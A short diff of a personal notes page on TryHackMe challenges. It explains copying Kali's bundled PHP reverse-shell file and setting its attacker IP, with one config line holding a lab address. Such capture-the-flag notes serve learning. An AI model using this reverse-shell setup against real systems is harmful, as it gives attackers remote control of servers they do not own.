FullByte/FullByte.github.io/docs/tech/hack/challenges/tryhackme.com.md

 Kali comes with some reverse shells e.g. [php-reverse-shell](http://pentestmonkey.net/tools/php-reverse-shell) "/usr/share/webshells/php/php-reverse-shell.php".

-Let's create a copy of this file and modify the two input fields marked with "// CHANGE THIS"
+Let's create a copy of this file and modify the two input fields marked with "// CHANGE THIS".
+The IP address to put here belongs to our kali machine.

 ```config
 $ip = '10.9.182.239';  // CHANGE THIS